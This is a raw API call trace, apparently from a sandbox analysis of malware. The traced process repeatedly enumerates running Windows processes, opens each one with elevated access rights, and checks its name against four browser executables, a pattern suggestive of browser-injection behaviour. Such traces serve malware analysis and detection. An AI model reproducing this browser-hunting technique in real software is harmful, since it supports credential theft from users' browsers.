	[0233.617] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0233.618] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x7124
	[0233.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.619] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0233.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.619] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.620] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0233.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.620] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.620] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.621] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x7128
	[0233.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.622] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.622] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.623] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.623] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.623] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.624] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.625] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x712c
	[0233.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.626] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.630] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.631] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.631] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.632] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.633] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x7130
	[0233.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.633] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.633] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.634] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.634] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.634] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0233.635] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x7134
	[0233.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.636] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0233.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.636] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.637] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0233.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.637] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.638] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0233.639] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x7138
	[0233.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.639] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.639] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.640] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.640] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.640] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.642] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x713c
	[0233.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.642] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.642] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.643] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.645] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.646] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.647] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x7140
	[0233.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.647] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.647] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.648] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.648] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.648] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0233.649] CloseHandle (hObject=0x4fd0) returned 1
	[0233.650] Sleep (dwMilliseconds=0x64) 
	[0233.753] GetCurrentProcessId () returned 0x110
	[0233.753] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0233.759] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0233.761] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0233.763] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0233.765] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x7144
	[0233.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.765] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0233.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.766] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.766] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0233.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.766] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.766] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0233.768] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x7148
	[0233.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.768] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0233.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.768] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.768] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0233.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.769] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.769] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0233.770] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x714c
	[0233.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.770] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0233.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.770] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.770] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0233.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.771] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.771] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0233.772] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x7150
	[0233.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.772] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0233.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.772] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.772] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0233.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.773] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.773] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0233.774] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x7154
	[0233.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.774] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0233.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.774] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.774] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0233.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.775] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.775] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0233.776] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x7158
	[0233.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.776] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0233.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.776] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.776] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0233.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.778] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.778] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0233.779] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x715c
	[0233.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.779] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0233.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.779] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.780] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0233.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.780] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.780] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0233.781] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x7160
	[0233.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.781] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0233.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.781] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.781] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0233.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.782] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.782] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.783] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x7164
	[0233.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.783] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.784] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.784] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.784] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.785] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.785] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x7168
	[0233.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.786] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.786] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.786] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.787] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.787] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.787] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x716c
	[0233.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.788] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.788] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.788] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.789] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.789] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.790] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x7170
	[0233.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.790] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.790] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.790] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.791] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.791] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.792] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x7174
	[0233.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.792] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.792] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.792] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.793] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.793] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.794] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x7178
	[0233.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.794] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.794] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.794] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.795] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.795] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.796] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x717c
	[0233.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.797] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.797] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.797] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.798] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.799] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0233.799] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x7180
	[0233.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.800] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0233.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
